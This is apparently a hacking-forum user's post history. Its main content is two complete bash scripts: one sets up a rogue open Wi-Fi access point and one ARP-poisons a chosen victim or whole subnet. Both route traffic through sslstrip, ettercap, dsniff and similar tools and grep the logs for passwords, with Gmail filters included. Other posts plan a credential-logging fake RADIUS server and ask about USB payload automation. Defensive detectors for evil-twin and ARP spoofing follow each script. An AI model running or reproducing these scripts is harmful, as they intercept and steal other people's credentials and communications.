-
Posts
25 -
Joined
-
Last visited
Junke1990's Achievements
Newbie (1/14)
-
VB used to stand for VisualBasic, possibly years ago
- 15 replies
-
- screenlock
- lock
-
(and 1 more)
Tagged with:
-
You just made me feel old...xD
-
Oh! I thought you were bullshitting me: "I need to mount a VB to check?" Mounting Visual Basic? :P Thanks for the effort!
-
That doesn't answer my question: is it possible to detect it, yes or no, and if so, how?
-
My question is: is it possible to detect if a Windows (XP SP3+) machine is locked? Regardless of the payload, I want to be able to automate more, and thus detect in code whether it is locked. I could make 2 payloads, locked and unlocked, but I would like to combine that into 1.
-
Windows, at least at first. I do have Linux but no OSX in house.
-
Is there an easy way to detect whether the screen is locked or not?
-
Thanks! Any tips/pointers I should look into while waiting on the post?
-
Where should the extensions go? There isn't anything about it in the https://bunnytoolkit.com/guides/ guide. The Git repo and docs (https://github.com/hak5/bashbunny-payloads/tree/master/docs) say payload/library/extensions; on the other hand, the https://wiki.bashbunny.com/#!index.md guide says payload/extensions. P.s. mine was shipped about an hour ago, so I can't test it out myself.
-
If you have any suggestions please let me know!

#!/bin/bash
# SoftAP for wireless-testing
# Created/Modded by Junke1990
#
# Hardware: Eee PC 1000h
# NICs
# eth0 (LAN)
# ra0 (WLAN) rt2860STA
# wlan1 (USB WLAN) RTL8170L
# dealextreme sku.27963

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'

# services
dsn=0 # Dsniff
ims=0 # IMsniff
msg=0 # MSGsnarf
url=0 # URLsnarf
ssllog1=0 # tail sslstrip.log
ssllog2=0 # tail sslstrip.log |grep pass

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

modprobe tun
sleep 1

echo "[>] Starting: Soft AP - Junke1990"

# get interface and mac list
i=0
iflist=()
maclist=()
while read -r if mac; do
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done

echo -n "[?] Select your inet conn. [#] "
read j
intI=${iflist[j]}

# select SoftAP adapter
for i in "${!iflist[@]}"; do
  if [ $j != $i ]; then
    echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
  fi
done

echo -n "[?] Select your SoftAP adapter. [#] "
read j
intAP=${iflist[j]}
# MAC address
intAP_MAC=${maclist[j]}

echo "[+] Gathering network info..."
# info inet conn
intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"`
intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2`
intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`

# converting netmask in to netmask length
echo "[+] Calc'ing network mask..."
NETMASK=$intI_mask
MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
MASK=$(( BM1 + BM2 + BM3 + BM4))
intI_mask_nb=$MASK

# enter wireless essid name
echo -n "[?] Enter the desired name for wireless network: "; read ssid

# prepare interface / softap
#wlanconfig $intAP destroy
#wlanconfig $intAP create wlanmode mon wlandev wifi0
if [ `echo $intAP || grep 'mon' ` ]; then
  intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
fi

echo "[+] Setting up fake AP..."; sleep 1;
# to enable wep add: -W 1 -w "1234567890" -a $intAP_MAC
xterm -geometry 75x15 -e airbase-ng -c 6 -e "$ssid" $intAP &
sleep 1;
ifconfig at0 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net $intI_netw netmask $intI_mask gw $intI_gw
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1

# monitor
#xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
#xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3

echo "[+] Killing dhcpd..."
# do this quiet for when the process isn't running
killall -q dhcpd3

echo "[+] Setting up DHCP config..."
# create custom dhcpd.conf for WLAN
DHCPDCONF='';
cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.3.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.3.255;
option routers 192.168.3.1;
EOF
### Submitted by ToomSec
for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
do
  echo "option domain-name-servers $d;" >> dhcpd.conf
done
cat >> dhcpd.conf << EOF
range 192.168.3.10 192.168.3.254;
}
EOF

echo "[+] Cleaning up IP tables..."
# iptables cleanup
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Setting up forwarding tables..."
# iptables
#iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
#iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip
iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
#iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN

# ip fwd enable
echo 1 > /proc/sys/net/ipv4/ip_forward

# start dhcp server for subnet
# edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
echo "[+] Setting up DHCP server..."
xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  echo "[+] Setting up sslstrip..."
  xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
  if [ $ssllog1 == 1 ]; then
    xterm -e tail -f sslstrip.log &
  fi
  if [ $ssllog2 == 1 ]; then
    xterm -e "tail -f sslstrip.log |grep 'pass' "&
  fi
  sleep 1
else
  echo "[-] SSLStrip not found..."
  echo 'Edit $sslstrip to the correct path.'
fi

# DSniff
if [ $dsn == 1 ]; then
  if which dsniff >/dev/null; then
    echo "[+] Setting up dsniff..."
    xterm -e dsniff -i at0 -m &
    sleep 1
  fi
fi

# IMSniff - MSN only
if [ $ims == 1 ]; then
  if which imsniff >/dev/null; then
    echo "[+] Setting up IMSniff..."
    if [ ! -d 'IMlog' ]; then
      mkdir IMlog
    fi
    # gives a lot of unknown content err's
    xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"&
    sleep 1
  fi
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if [ $msg == 1 ]; then
  if which msgsnarf >/dev/null; then
    echo "[+] Setting up MSGsnarf..."
    xterm -e msgsnarf -i at0 &
    sleep 1
  fi
fi

# URLSnarf
if [ $url == 1 ]; then
  if which urlsnarf >/dev/null; then
    echo "[+] Setting up URLsnarf..."
    xterm -e urlsnarf -i at0 &
    sleep 1
  fi
fi

# ettercap TCP Ports
# IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3 - 110/TCP 995/TCP
# SMTP - 25/TCP 465/TCP
# SSL - 443/TCP
# HTTP - 80/TCP
# SSH - 22/TCP
# MSN - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ - 5190/TCP - nobody at all uses ICQ xD
echo "[+] Setting up ettercap..."
#xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 &
### Submitted by ToomSec
#ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1
xterm -e ettercap -T -q -p -u -z -m ettercap_evilap.log -i at0 &
sleep 1

# ip_forward
# as last to avoid reset
echo "[+] Enabling IP forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "[-] Can NOT enable ip_forward..."
fi

echo "[x] All done! have fun!"
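The script in this post advertises whatever SSID the operator types, from the adapter's own MAC, and leaves the network open unless the commented-out WEP options are added. From the defender's side that is exactly what a wireless IDS inventory check catches: a known SSID being beaconed from a BSSID that is not in the inventory, or with weaker security than the real network uses. The detector below is an added example for this thread, not code from the original post or from Junke1990; the authorised-AP inventory, the scan lines and the tab-separated "BSSID ENC SSID" line format are all constructed assumptions (a real deployment would feed it from a scanning tool).

```python
"""Evil-twin / rogue AP check over constructed scan results (added example)."""

# Constructed inventory of authorised access points: SSID -> allowed BSSIDs
# and the security mode the real network is expected to advertise.
AUTHORISED_APS = {
    "CorpWiFi": {"bssids": {"00:11:22:33:44:01", "00:11:22:33:44:02"}, "enc": "WPA2"},
    "CorpGuest": {"bssids": {"00:11:22:33:44:03"}, "enc": "WPA2"},
}

# Constructed scan output: two legitimate APs, a soft AP beaconing the
# corporate SSID as an open network from an unknown BSSID, and a neighbour.
SAMPLE_SCAN = """\
00:11:22:33:44:01\tWPA2\tCorpWiFi
00:11:22:33:44:03\tWPA2\tCorpGuest
aa:bb:cc:dd:ee:66\tOPEN\tCorpWiFi
de:ad:be:ef:00:01\tWPA2\tNeighbourNet
"""


def parse_scan(text):
    """Parse constructed 'BSSID<TAB>ENC<TAB>SSID' lines into tuples.

    Malformed lines are skipped rather than aborting the whole scan.
    """
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 3:
            continue
        bssid, enc, ssid = parts
        rows.append((bssid.strip().lower(), enc.strip().upper(), ssid.strip()))
    return rows


def find_rogue_aps(rows, inventory):
    """Return alert strings for SSIDs we own that are beaconed wrongly.

    Two rules: (1) our SSID from a BSSID not in the inventory (evil twin /
    soft AP); (2) our SSID advertised with a different security mode than
    expected (open or WEP where WPA2 is the standard). SSIDs not in the
    inventory are somebody else's network and are ignored.
    """
    alerts = []
    for bssid, enc, ssid in rows:
        expected = inventory.get(ssid)
        if expected is None:
            continue
        if bssid not in expected["bssids"]:
            alerts.append(f"unknown BSSID {bssid} advertising our SSID '{ssid}'")
        if enc != expected["enc"]:
            alerts.append(f"'{ssid}' from {bssid} uses {enc}, expected {expected['enc']}")
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_aps(parse_scan(SAMPLE_SCAN), AUTHORISED_APS):
        print("ALERT:", alert)
```

The inventory check is deliberately SSID-keyed: the neighbour's network produces no noise, while a single rogue beacon of the corporate SSID produces two independent findings (unknown BSSID, wrong security mode), which makes the alert robust even if an attacker later clones a real BSSID or adds WEP.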
-
I honestly don't know, I'm not that big of an expert when it comes to ettercap. I did update the script to make it easier, but it is still a work in progress. I have a Soft AP script too; if you want I can put it up here too. It is based on this one but has a few other features, since you are actually in the middle of the traffic.
-
Hey guys, since I was getting tired of doing everything by hand I made a little script to automate the procedure xD Let me know if something is done wrong or you have suggestions!

#!/bin/bash
# ARP Poisoning
# Created by Junke1990
# Tested with Asus eee 1000h
#
### required packages ###
# sudo apt-get -y install ettercap python-twisted-web2 dsniff imsniff python
# sslstrip - google, download, extract and alter path below!

# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'
logfolder='ARP-logs/'

# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

modprobe tun
sleep 1

# get interface and mac list
i=0
iflist=()
maclist=()
while read -r if mac; do
  iflist[i]=$if
  maclist[i]=$mac
  ((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')

for i in "${!iflist[@]}"; do
  echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done

echo -n "Select your interface to ARP poison. [#] "
read j
int=${iflist[j]}

echo -n "IP address of victim: [x.x.x.x]/[a]"
read vic

# info inet conn
int_IP=`ifconfig $int | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
int_gw=`route -n | awk '{ print $2}' |grep -v '0.0.0.0' | sed -n "3 p"`
int_bc=`ifconfig $int | grep 'Bcast:'|cut -d: -f3 | awk '{ print $1}'`

# lowest IP
oct4=`echo ${int_gw} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
oct4=$((oct4+1))
int_a=`echo $int_gw | cut -d. -f1,2,3`
int_a="$int_a.$oct4"
# highest IP
oct4=`echo $int_bc | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
int_b=$((oct4-1))
# range
int_range="$int_a-$int_b"

# determine victim
if [ $vic = "a" ]; then
  vic=$int_range;
fi

# iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# ettercap TCP Ports
# IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3 - 110/TCP 995/TCP
# SMTP - 25/TCP 465/TCP
# SSL - 443/TCP
# HTTP - 80/TCP
# SSH - 22/TCP
# MSN - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ - 5190/TCP - nobody at all uses ICQ xD
xterm -e ettercap -T -P autoadd -i $int -L ettercap.log -m ettercap.msg.log -l ettercap.info.log -w ettercap.pcap -M arp /$int_gw/ /$vic/22,25,80,110,143,220,443,465,993,995 &

### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
  xterm -title sslstrip -e python $sslstrip -s -f -k -l 8080 &
  sleep 1
  xterm -e tail -f "sslstrip.log" &
  sleep 1
  xterm -e "tail -f sslstrip.log |grep -i 'pass' "&
  # filters - not fully tested!
  # xterm -title HYVES -e "tail -f sslstrip.log |grep 'auth_username' | sed 's/.*auth_username=/user=/' | sed 's/\&/ /g' | awk '{print $1 $2}'"&
  # xterm -title GMAIL -e "tail -f sslstrip.log |grep Passwd | sed 's/.*Email=/Email=/' | sed 's/\&/ /g' | awk '{print $1 $2 }'"&
else
  echo "sslstrip not found."
  echo 'Edit $sslstrip to the correct path.'
fi

# DSniff
if which dsniff >/dev/null; then
  xterm -e dsniff -i $int -m -w dsniff.log &
fi

# IMSniff - MSN only
if which imsniff >/dev/null; then
  if [ ! -d 'IMlog' ]; then
    mkdir IMlog
  fi
  # gives a lot of unknown content err's
  xterm -e "imsniff -cd IMlog $int |grep -i -v 'unknown'"&
fi

# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if which msgsnarf >/dev/null; then
  xterm -e msgsnarf -i $int &
fi

### SINGLE VICTIM ONLY ###
# SSH mitm
if which sshmitm >/dev/null; then
  if [ $vic != "a" ]; then
    xterm -e sshmitm -I $vic &
  fi
fi

# ip_forward
# as last to avoid reset
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
  echo "Can't enable ip_forward"
fi

edit: updated the script
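What the ARP-poisoning run above looks like on the wire is simple to describe: the gateway's IP suddenly resolves to a new MAC, the victim's IP resolves to that same MAC, and one station is therefore answering for two addresses at once. Those are the two signals a host- or switch-side monitor (or DHCP-snooping/dynamic ARP inspection, which the school thread mentions) keys on. The detector below is an added example for this thread, not code from the original post or from Junke1990; the ARP reply lines and their "time sender_ip sender_mac target_ip" format are constructed assumptions, standing in for what a capture tool would emit.

```python
"""ARP spoofing detector over a constructed stream of ARP replies (added example)."""
from collections import defaultdict

# Constructed sample: gateway 192.168.1.1 (real MAC ...:01), host .20 (real
# MAC ...:20), then a third MAC (...:66) answering for both addresses, which
# is what a two-sided gateway/victim poisoning looks like.
SAMPLE_ARP_REPLIES = """\
10:00:01 192.168.1.1 aa:bb:cc:00:00:01 192.168.1.20
10:00:02 192.168.1.20 aa:bb:cc:00:00:20 192.168.1.1
10:00:03 192.168.1.1 aa:bb:cc:00:00:66 192.168.1.20
10:00:03 192.168.1.20 aa:bb:cc:00:00:66 192.168.1.1
10:00:05 192.168.1.1 aa:bb:cc:00:00:66 192.168.1.20
"""


def parse_arp_replies(text):
    """Parse constructed 'ts sender_ip sender_mac target_ip' lines into tuples."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of aborting
        ts, sender_ip, sender_mac, target_ip = parts
        records.append((ts, sender_ip, sender_mac.lower(), target_ip))
    return records


def detect_arp_spoofing(records, gateway_ip=None):
    """Return alert strings for suspicious IP/MAC behaviour.

    Rule 1: an IP previously bound to one MAC is now claimed by another
            (flagged GATEWAY when it is the default gateway, HOST otherwise).
    Rule 2: a single MAC answers for more than one IP; reported once, the
            first time its set of claimed IPs grows past one.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, sender_ip, sender_mac, target_ip in records:
        known = ip_to_mac.get(sender_ip)
        if known is None:
            ip_to_mac[sender_ip] = sender_mac
        elif known != sender_mac:
            kind = "GATEWAY" if sender_ip == gateway_ip else "HOST"
            alerts.append(
                f"{ts} {kind} binding changed: {sender_ip} was {known}, "
                f"now {sender_mac} (reply sent to {target_ip})"
            )
            ip_to_mac[sender_ip] = sender_mac  # follow the latest claim so a flip back is seen too

        before = len(mac_to_ips[sender_mac])
        mac_to_ips[sender_mac].add(sender_ip)
        after = len(mac_to_ips[sender_mac])
        if after > 1 and after > before:
            alerts.append(
                f"{ts} MAC {sender_mac} claims multiple IPs: {sorted(mac_to_ips[sender_mac])}"
            )
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(parse_arp_replies(SAMPLE_ARP_REPLIES), gateway_ip="192.168.1.1"):
        print("ALERT:", alert)
```

A single binding flip can be legitimate (a DHCP lease moving to another machine, a router failover), so rule 1 on its own is a signal rather than proof; the gateway flip combined with rule 2 firing for the same MAC is the pattern worth paging on. Static ARP entries for the gateway, or dynamic ARP inspection on the switch, are the mitigations that make the flip impossible rather than merely visible.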
-
From where are you trying to connect to your WAN IP? I know that when I connect to my WAN IP from inside the network, the traffic isn't forwarded; the router thinks it's for itself.
-
Hey guys, I wanted to see if I could MiTM at my school, but again and again it was unsuccessful. By simply asking the guys of the IT department I now know they use a RADIUS server with AD, but worse, DHCP snooping. Therefore I cannot use the ARP poisoning or DHCP exhaustion. Best part, I've got permission to screw around with the network as much as I want since """I was such a great student thinking along with them to "solve" the security issues""". So I was thinking about setting up a Soft AP with NAT and my own RADIUS server which accepts every login and logs those, and with a second interface to connect to the actual network and pass the information, stripped, through. I've ordered a nice wireless card online to make sure my signal is better, http://www.dealextreme.com/details.dx/sku.27963 Any ideas or thoughts?
-
If an external adapter is an option: I'm the owner of an EEE 1000h, not suited for VMs, but besides that, I was looking for an external WLAN adapter with a lot of power and it had to be cheap. Check this one out: http://www.dealextreme.com/details.dx/sku.27963 It's based on a RTL8187L chipset. I don't have it yet, it's still on its way, but the reviews of other people are very promising. Here's a nice review of the product: http://www.dealextreme.com/forums/Default....threadid.537069